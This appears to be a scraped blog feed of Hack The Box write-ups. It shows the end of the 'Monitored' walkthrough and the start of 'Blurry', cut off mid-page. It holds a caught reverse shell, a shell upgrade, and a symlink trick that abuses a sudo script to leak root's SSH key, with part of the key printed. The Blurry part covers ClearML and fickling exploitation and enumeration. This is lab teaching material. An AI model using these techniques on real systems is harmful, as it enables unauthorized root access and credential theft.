url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB2ElEQVR42q2Uy07bQBiFIxIEcRw7tnNBUXAcpbGdxLJyKVKj5lYsFkFQFlXLjlU3VZ+kiy7ZIUBCQmKNAIlNH6CIRV/o4P8XdsvNhJLFNzMej8+cOTOeWKFQgGmaqNVqqFarUBTlVcQ0TUOpVIIkSYwoipGkUilkMhmoqsr1v7AgOWw0GnAcB5VKBdlsFrlc7kny+XxY34cFi8UixuMxer0e+v0+hsMht6kejUb8jmpiMBhwv+d5PKbT6aDb7TLtdpvNxGi2IENyWC6XGcMwGOoL2tSv6/qd5wDqpxhiVNi2Ddd1eYZkMglBECKhHGVZfkC4KZZlcYaUQzqdDjfoKehjMnKfUDBwSMunnSTRKEg08tgEgi9xGCn4P0ueyuHMlkzHptlsssOZCNbrdbRardk5tPwlc4b+b/jqDFW/MCsGHNuC4ostxOMQ5hNIzseZxUQcon+Qp3aYL+l4u/EJ77a+wPXWYfZGeDNcg706gf1hAsebQF0qIu1HIUny8w6NlffYObvGzukVvl3+wffz3/h8/Avb+6fYPjzH16ML6G4XspiCpmXv/BWPCi47bWz+PPQ5wPqPPWztnsBe+wghMRfej8rtXTfVBUuDM7L0F8rn9gJ9zs1jgjd4wu02G81K4gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI Check command shell" title="" src="/static/01703318b002ec4f5ec0e7373d09b6ea/6cac4/nagios-xi-check-command-shell.png" srcset="/static/01703318b002ec4f5ec0e7373d09b6ea/dda05/nagios-xi-check-command-shell.png 158w, /static/01703318b002ec4f5ec0e7373d09b6ea/679a3/nagios-xi-check-command-shell.png 315w, /static/01703318b002ec4f5ec0e7373d09b6ea/6cac4/nagios-xi-check-command-shell.png 572w" sizes="(max-width: 572px) 100vw, 572px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Once the command was run, <code class="language-text">nc</code> caught a shell as <code class="language-text">nagios</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.11.248] 36592 bash: cannot set terminal process group (18368): Inappropriate ioctl for device bash: no job control in this shell nagios@monitored:~$ id id uid=1001(nagios) gid=1001(nagios) groups=1001(nagios),1002(nagcmd) nagios@monitored:~$ ls ls cookie.txt user.txt</code></pre></div> <p>I upgraded the shell with the following commands:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm Ctrl + Z stty raw -echo; fg</code></pre></div> <p>The <code class="language-text">nagios</code> user had the following sudo privileges:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">nagios@monitored:~$ sudo -l Matching Defaults entries for nagios on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User nagios may run the following commands on localhost: (root) NOPASSWD: /etc/init.d/nagios start (root) NOPASSWD: /etc/init.d/nagios stop (root) NOPASSWD: /etc/init.d/nagios restart (root) NOPASSWD: /etc/init.d/nagios reload (root) NOPASSWD: /etc/init.d/nagios status (root) NOPASSWD: /etc/init.d/nagios checkconfig (root) NOPASSWD: /etc/init.d/npcd start (root) NOPASSWD: /etc/init.d/npcd stop (root) NOPASSWD: /etc/init.d/npcd restart (root) NOPASSWD: /etc/init.d/npcd reload (root) NOPASSWD: /etc/init.d/npcd status (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php * (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php * (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php * (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh * (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh * (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *</code></pre></div> <p>The <code class="language-text">getprofile.sh</code> script gathers various logs and system details and then compresses the collected data into a ZIP archive. The following section of <code class="language-text">getprofile.sh</code> checks if <code class="language-text">/usr/local/nagiosxi/tmp/phpmailer.log</code> exists, and if so, uses <code class="language-text">tail</code> to retrieve the last 100 lines from the <code class="language-text">phpmailer.log</code> file and saves this output to a specified folder:</p> <div class="gatsby-highlight" data-language="bash"><pre class="language-bash"><code class="language-bash"><span class="token builtin class-name">echo</span> <span class="token string">"Getting phpmailer.log..."</span> <span class="token keyword">if</span> <span class="token punctuation">[</span> <span class="token parameter variable">-f</span> /usr/local/nagiosxi/tmp/phpmailer.log <span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token keyword">then</span> <span class="token function">tail</span> <span class="token parameter variable">-100</span> /usr/local/nagiosxi/tmp/phpmailer.log <span class="token operator">></span> <span class="token string">"/usr/local/nagiosxi/var/components/profile/<span class="token variable">$folder</span>/phpmailer.log"</span> <span class="token keyword">fi</span></code></pre></div> <p><code class="language-text">nagios</code> owned <code class="language-text">/usr/local/nagiosxi/tmp/phpmailer.log</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">nagios@monitored:~$ ls -l /usr/local/nagiosxi/tmp/phpmailer.log -rw-r--r-- 1 nagios nagios 0 Nov 10 2023 /usr/local/nagiosxi/tmp/phpmailer.log</code></pre></div> <p>Since <code class="language-text">nagios</code> was the owner of <code class="language-text">/usr/local/nagiosxi/tmp/phpmailer.log</code>, the file can be overwritten with a symlink to <code class="language-text">/root/.ssh/id_rsa</code> which will write the SSH key of <code class="language-text">root</code> into <code class="language-text">phpmailer.log</code>.</p> <p>So I created a symlink (<code class="language-text">/usr/local/nagiosxi/tmp/phpmailer.log</code>) that points to <code class="language-text">/root/.ssh/id_rsa</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">nagios@monitored:~$ ln -sf /root/.ssh/id_rsa /usr/local/nagiosxi/tmp/phpmailer.log nagios@monitored:~$ ls -l /usr/local/nagiosxi/tmp/phpmailer.log lrwxrwxrwx 1 nagios nagios 17 Oct 27 05:53 /usr/local/nagiosxi/tmp/phpmailer.log -> /root/.ssh/id_rsa</code></pre></div> <p>Then, I ran the script:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">nagios@monitored:~$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1 mv: cannot stat '/usr/local/nagiosxi/tmp/profile-1.html': No such file or directory -------------------Fetching Information------------------- Please wait....... Creating system information... Creating nagios.txt... &lt;...snip...> Zipping logs directory... &lt;...snip...> adding: profile-1730022910/phpmailer.log (deflated 24%) &lt;...snip...> Backup and Zip complete!</code></pre></div> <p><code class="language-text">profile.zip</code> was now in <code class="language-text">/usr/local/nagiosxi/var/components</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">nagios@monitored:~$ cd /usr/local/nagiosxi/var/components nagios@monitored:/usr/local/nagiosxi/var/components$ ls auditlog.log capacityplanning.log profile profile.zip</code></pre></div> <p>I extracted the archive, which then allowed me to read the private SSH key of the root user stored in <code class="language-text">profile-1730022910/phpmailer.log</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">nagios@monitored:/usr/local/nagiosxi/var/components$ unzip profile.zip Archive: profile.zip &lt;...snip...> inflating: profile-1730022910/phpmailer.log &lt;...snip...> nagios@monitored:/usr/local/nagiosxi/var/components$ cat profile-1730022910/phpmailer.log -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAnZYnlG22OdnxaaK98DJMc9isuSgg9wtjC0r1iTzlSRVhNALtSd2C &lt;...snip...> CNvArnlhyB8ZevAAAADnJvb3RAbW9uaXRvcmVkAQIDBA== -----END OPENSSH PRIVATE KEY-----</code></pre></div> <p>I saved the key locally and then used it to log in as <code class="language-text">root</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ ssh -i root.key root@10.10.11.248 &lt;...snip...> root@monitored:~# id uid=0(root) gid=0(root) groups=0(root) root@monitored:~# ls root.txt</code></pre></div>https://mgarrity.com/hack-the-box-blurry/https://mgarrity.com/hack-the-box-blurry/Mon, 21 Oct 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7a04c59d588757ff4c86ed264dd9d5ad/3b67f/blurry.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABDklEQVR42mMQkdX+jwuLymn/F5LR+c8jqftfUAbCx6cehBnwGcYrqfNfTEr5v66q3H9pGWWgwYQNZcBlGL+Uzn8TPfX/c1rj/m/aOPF/dWXMfwsDzf98UvgNxWqgkKzOfwlZ1f9T68L/55UW/Td0C/2vHZLwv7oo8L80UBwkT7SBYK9K6f7X11T6P3dR439JHcv/HAwM/znldf/3zWv6b6ylDJTXwelK7C4ERoSMvPr/+gLf/+oewf85VE3/eyal/e+rj/ovLqXyX5gUF4KwGNB2UASYA8OwvDj0f9n0lv8NlVH/LfTVweJichTEsgwwzEyB3hSXVAHyyYxlZJcKy+r+55XW/S8ip4vXZTADAVZxBQECDEI7AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Blurry" title="" src="/static/7a04c59d588757ff4c86ed264dd9d5ad/50637/blurry.png" srcset="/static/7a04c59d588757ff4c86ed264dd9d5ad/dda05/blurry.png 158w, /static/7a04c59d588757ff4c86ed264dd9d5ad/679a3/blurry.png 315w, /static/7a04c59d588757ff4c86ed264dd9d5ad/50637/blurry.png 630w, /static/7a04c59d588757ff4c86ed264dd9d5ad/fddb0/blurry.png 945w, /static/7a04c59d588757ff4c86ed264dd9d5ad/3b67f/blurry.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Blurry is a Linux machine running an application with a vulnerable version of ClearML, which contains a deserialization flaw (CVE-2024-24590). This vulnerability allows a malicious artifact to be uploaded, leading to arbitrary code execution on the machine of any user who interacts with it. Exploiting this on Blurry results in a shell as the user <code class="language-text">jippity</code>, who has sudo permissions to run a script that evaluates machine learning models for safety. Upon inspecting the script, it is found to utilize the <code class="language-text">fickling</code> Python decompiler and static analyzer. The security checks performed by <code class="language-text">fickling</code> can be bypassed, allowing for a poisoned PyTorch model file to be executed with sudo privileges, resulting in a root shell.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ nmap -sC -sV -oA nmap/output 10.10.11.19 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-18 17:23 EDT Nmap scan report for blurry.htb (10.10.11.19) Host is up (0.049s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA) | 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA) |_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519) 80/tcp open http nginx 1.18.0 |_http-server-header: nginx/1.18.0 |_http-title: Did not follow redirect to http://app.blurry.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds</code></pre></div> <p>Since the Nmap scan showed a subdomain (<code class="language-text">http://app.blurry.htb</code>) on port 80, I used <code class="language-text">ffuf</code> to fuzz virtual hosts for any other subdomains:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.11.19 -H "Host: FUZZ.blurry.htb" -mc all -ac /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.11.19 :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt :: Header : Host: FUZZ.blurry.htb :: Follow redirects : false :: Calibration : true :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: all ________________________________________________ api [Status: 400, Size: 280, Words: 4, Lines: 1, Duration: 52ms] files [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 97ms] app [Status: 200, Size: 13327, Words: 382, Lines: 29, Duration: 90ms] chat [Status: 200, Size: 218733, Words: 12692, Lines: 449, Duration: 95ms]</code></pre></div> <p>I added the discovered subdomains to <code class="language-text">/etc/hosts</code> and then visited <code class="language-text">http://chat.blurry.htb</code> which was a RocketChat workspace:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3ae81ed1b520ca9e12a6c2cf5e6394e9/d9f0b/blurry-vision-chat.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 98.10126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAADJklEQVR42o1U2U5TURTlX5QydJ5LgbaUCBIgBVvGMhSQiAFRqdKgEAiJxj/wH/wG332kQMEHH0ykBQ0BoVTo7bTc+9z29qKiNlk99+y9z7p7WOfWGG2t+BtMqtX0j1izw4uaa4ftDI8AO00Ej9OHDqcfHQ4fWghsY79MIMepOa4R6i3NaDS6UG9wQqO1oU5nF3uDqQlmaysa9A5oyKY1uWGwtqCB42jPzwohv01ndsPj78bG5htEY2t4En2BxacxzC0sYebBIibvz2Nt4zUWnsQwNbuAacLq+issLb8UcU2eDpGMkiG/weryob0zgI7uILp6B9AdGMLA6BT6BycwOj6LQDCM0EgEQ+Fp3Onqh59iOY5hdbUpWSols0FLpTUS6qg0C/VufvE5Hj6KYnllHSurm3gWW8Xs3GPYmvyiXG5Hg8GlkHG1VUKClkrXlcHkDKOtRfj0dh+0llbZp4pjVIeqIuQNv1kNu9sveutt74WluQsWd+dvMYzK1E1iKCSFeioxNDyJLwdJpFJHOEimkEweIpk6xAHZZHtKgG1qHH39JvrNyhA6NJPGePTc7Hw+j8PDI0iShP/5lUolsQZCYZKYQybk5mt0LgzSBLNZCaffz3CeTiOTyaBULIpDN6FIfkEYrBBSD51uDxE6SCIzKBQKyBOYOEtZ5ijjAh0q8uE/gOMrhFylo7mdM/RCZ7JhYGRKBEi5nCi9VC5JrL+iVIFccl9ojITtFgOim+KlodgxMhZBjsjSFxnKMHtjVjIJr0VcXV0KwnskftakkI3oodZOGUaUntzUMyaS8iWcXxaQJhyfXZYzDIt7rwyFGzo0GsHpRQ7vExI+fJKo7IJogRo8/cyPK5ycZ3GSlkQ851AdCsuG/jRaB8YnpvH5uIjg2wKi74igWJaGSibcWybNFUrI5iGyrWZYJuS6WZQ9fcPYim/j434C+3u72NreQXx7V2CLEefnBOI7CcUep5idxB7u9oTE3RY9NKi+hfwNNNB3z0xtYCcrgLWlMXpwy+hDrYFWgxeNZg9qaX9b30pysUFvle87Q8imCp8Cqwqyre2a/zqqHD8BMWDbVcAMycAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Blurry Vision chat" title="" src="/static/3ae81ed1b520ca9e12a6c2cf5e6394e9/50637/blurry-vision-chat.png" srcset="/static/3ae81ed1b520ca9e12a6c2cf5e6394e9/dda05/blurry-vision-chat.png 158w, /static/3ae81ed1b520ca9e12a6c2cf5e6394e9/679a3/blurry-vision-chat.png 315w, /static/3ae81ed1b520ca9e12a6c2cf5e6394e9/50637/blurry-vision-chat.png 630w, /static/3ae81ed1b520ca9e12a6c2cf5e6394e9/d9f0b/blurry-vision-chat.png 824w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After creating an account, the home page for Blurry Vision was brought up:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0582d5280a1e605e88e32e0bd231f6c8/d9f0b/blurry-vision-chat-home-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 94.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAACOElEQVR42pVUWXbTQBD0OVhivMlaR6NltFtyMI6A8JFHOAH3v0PR3YlkG4ENH/Va80aqqa5qzcxtf6A5fkfRHJELPkl1wxxhUiLOdlhsPMyXDuar25gF+x6m7aFNizjfI8o6RFRdXQjR0vLxfrHF2/kG7z5YYx2eee+C8Ln8iePHZ1REHCY7BEmDItsj0SU8nSEhhUFc0F4FRYqTvEUQ0TqtEJkalqtxt7RPhHX0iDQ7kKqOXtpBERLTQYUFvNAgLTppO8l3YgGvo6yBTmuYijpR6YXKmW/45EbAhAJq3yVC24/hk0qGqwwUKfV1TgpzIXlzt5q2PJKcgf30iHBjh1BRKfApJMuNRqy2agL2/K+EnLLlaKRkBSNKG9heAsdPqaZwGL6R9daNYTsJVlZwXeGaTvWImBFQ6qz0pVZSA10K+CDLia4TssINKay7z+gO38i3kg4I5cMBG1uPz1snphG7pvB1DpmUwWR/8u2/PTTFXvxjNQPOFQ7rmwqlZUqZ0/VUNnp48rEUG7hyMP/sYbF7QNk+0PzRXHKaFMAISTyRlG8Ssofcgoor+kNqbD0eCyVennC5Xmz86wrXtpKWuOVLopeAuLKHa7KGIYTq9f8dMB1suiiyVkjZK5eqp3L4hMG7i1BSIojololTRjsZ7DCuZZC5bU1p+2dD7gZmSvhYHfFU93ii2uf3ovKUssbu/qtcvqY6UDi9fMzt/T5CI2HZ9XQXfoGm1pSZDjZ7xS/K8E5CCSeD/Qt1QU97pJW1DwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Blurry Vision chat home page" title="" src="/static/0582d5280a1e605e88e32e0bd231f6c8/50637/blurry-vision-chat-home-page.png" srcset="/static/0582d5280a1e605e88e32e0bd231f6c8/dda05/blurry-vision-chat-home-page.png 158w, /static/0582d5280a1e605e88e32e0bd231f6c8/679a3/blurry-vision-chat-home-page.png 315w, /static/0582d5280a1e605e88e32e0bd231f6c8/50637/blurry-vision-chat-home-page.png 630w, /static/0582d5280a1e605e88e32e0bd231f6c8/d9f0b/blurry-vision-chat-home-page.png 824w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There wasn't anything that seemed useful in the General channel, so next I went to the Directory option in the top left navbar:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 280px; " > <a class="gatsby-resp-image-link" href="/static/3bf747070924cdb629945198cc38a089/f1fc5/blurry-vision-chat-navbar.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.78481012658228%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABC0lEQVR42m1Qy07DMBD0n3DgIWjT2IlT4iQ2TWhASSgU0ZYDVEK0B0BIPeXClQsSFz6HzxvWViMkxGE06/G+ZhmXGXiowCNNMH+g4RP3LKSGR+zL//J+wfr6BkfFmpLHsM2D4xE10QiJRZxDhRkehydYpiUakYCTJuhti0OKLeyQTmM7008ctN/YN1cwpsTdwzMC+jRFg2Z2D80VPl5avL1/YcETVJM5qstb9EhfP20wnS9xOIihi9otw/ayFXZXG/TrMwyjHOPq2k2zG8Z5DR2kaIlfLxaYCQWZniIx526rUTmBonhALqQqXB0TUQoRkBVpnFXP2trewyY6pqY+6f72hp3ukd7F3W1/AGpZqqvRYXgwAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Blurry Vision chat navbar" title="" src="/static/3bf747070924cdb629945198cc38a089/f1fc5/blurry-vision-chat-navbar.png" srcset="/static/3bf747070924cdb629945198cc38a089/dda05/blurry-vision-chat-navbar.png 158w, /static/3bf747070924cdb629945198cc38a089/f1fc5/blurry-vision-chat-navbar.png 280w" sizes="(max-width: 280px) 100vw, 280px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There was also an Announcements channel:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0b9d47523f47abcd0170e7f6f3d963b3/9f690/blurry-vision-chat-directory.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.202531645569614%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABMElEQVR42p1SSW7DMAz0RxovkrUvthzHDYKg6K3oPUCe0AL9/5UladhAc2sOBEVqNBySqsJwguXyDtNyhU5HOHSGrRb2KauEHUDHGXo3gDQJ2t6DQOKnCaWbwJY3kHYEGwooJLbxyMT/sU4F9pVQEYkmJtG+QG9JaWav3AgKC63nwnG/x+Mam4Fjl2b22HIEkwpIndiESgz06YRxxmJHCMPCZzKPD+P4yo+JLOHZ+MJ3pLI66w+4hW+cYQYTVhWCyHGejQys2ueZ7zrqBjshNQa7WnGZ820fEI8tX+Qn3PUPNMph1czAWlrcNA3Z7EsSOnDcqXVe5BvCCcP5zaqzQoX+C1oE0EJIDW2rkY49KaU8FaMc+c2o2Ibbt1yjkkNr9v/30uo/gC2//c3H+PHb/AJHRwiu8Ox3OAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Blurry Vision chat directory" title="" src="/static/0b9d47523f47abcd0170e7f6f3d963b3/50637/blurry-vision-chat-directory.png" srcset="/static/0b9d47523f47abcd0170e7f6f3d963b3/dda05/blurry-vision-chat-directory.png 158w, /static/0b9d47523f47abcd0170e7f6f3d963b3/679a3/blurry-vision-chat-directory.png 315w, /static/0b9d47523f47abcd0170e7f6f3d963b3/50637/blurry-vision-chat-directory.png 630w, /static/0b9d47523f47abcd0170e7f6f3d963b3/9f690/blurry-vision-chat-directory.png 791w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The Announcements channel contained the following message from an admin:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3989df5a1db617ab68451f6b0e01399c/50637/blurry-vision-chat-announcements-channel.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 136.0759493670886%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAbCAYAAAB836/YAAAACXBIWXMAAAsTAAALEwEAmpwYAAADPElEQVR42o1VSY7TUBD1EZBQS00GO47neLbjqWeEEBdAiAULFixYwhVYcigOwmWKevX9ncRJi16U6g/lGt4r1zd69wN9CX+SF+W0y/YUJhVLLXtzG5LlRP+Vjbsj24tFG433jj5G38nflZTvbyitesqqQZyaW2WsP7Kcy7JxY3aYyNpYbQNa2h6tbNaWR2vWyEwLHCNAWvYUpfWzWSM4xCjNR/rh/aame6T29onq9p4/7jjjnLZ+QgvT4UCO6JeIYVsx1Zu3ZHFk29txhj5dr2y5fLPeXvzo+BzrpeWKiMNr06Yrc82llVwa8OsorweRrO4Z14GK5oYKxrdkjXuscY77Uu4GcoJEnBtL06WV6THDNSVFS2FaUZw3jBf0XjTu0rKVLoh4vctrsUFHJEUj8Ewl6wXaxN8V04UuYy6rjXeiF5ay1TBMDkEAskNURAziUmBQZyUFWCf6vpB7ZAvmsUd3nDgEJs3wSPvhgfb9A9XdvUjV3lHZ3lLd3zNet4czxg52OIMGHIKhLg+gumE66kyytP1YjCBg/sDuqMc7OZ+X7EWZlINIQVyo/QgBykV5qmxVOmwgfqzKn9pGO4SjrO6k9Lzux/YYpMl1G4FpCNoL+0T2nQhYh9PJISLDGBdoH7QM9sl01sgesFhOyP8vfrVg0jg7cYi/BExvGTcIsIRgKEDjXrQfy2RReKfyjcNr2J2UjOhgT/8hYK/q7kRDcI49bNAqgASCpgdEurlnGR4yQwaadXWeClHY639Ys368nhwiAiIDL7CHtf7t9Bq4xiOW6Zgh1sgeAac+VCxzGSNbEM0cGFUOVFkAH9WADGSu9yDmxOExIdsJ9MOZK8BHRwyHQoRmeuPNSEFZ0ibcMiAlrXg9tgtK0z2n+xN3GGO6JzFcThwei+p6d7Y/17BRU8g5JwUlIQoIwWh66ciXwPwWiczHF/5JAPzc6L/obL2m5eKalsuFDA1DP4NOkMlT6vCk2Tj8xnrqaTwW2B2E90zQKn1Pi+4rLfafyXJTfqR8ZWg6ijnRLB4PTRAUpeg9Hv9MgrzNWhDAtun10y+6+vaXXn36Q1bYkqEf6XOJZxnFl20CfqujG7KiXmz+AdGHFx6B/zsAAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Blurry Vision chat announcements channel" title="" src="/static/3989df5a1db617ab68451f6b0e01399c/50637/blurry-vision-chat-announcements-channel.png" srcset="/static/3989df5a1db617ab68451f6b0e01399c/dda05/blurry-vision-chat-announcements-channel.png 158w, /static/3989df5a1db617ab68451f6b0e01399c/679a3/blurry-vision-chat-announcements-channel.png 315w, /static/3989df5a1db617ab68451f6b0e01399c/50637/blurry-vision-chat-announcements-channel.png 630w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The ClearML instance was located at <code class="language-text">app.blurry.htb</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ca05d2f829b3b1aa5a15fe4c44db054c/2fe53/clearml-login.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 89.87341772151898%; position: relative; bottom: 0; left: 0; background-image: 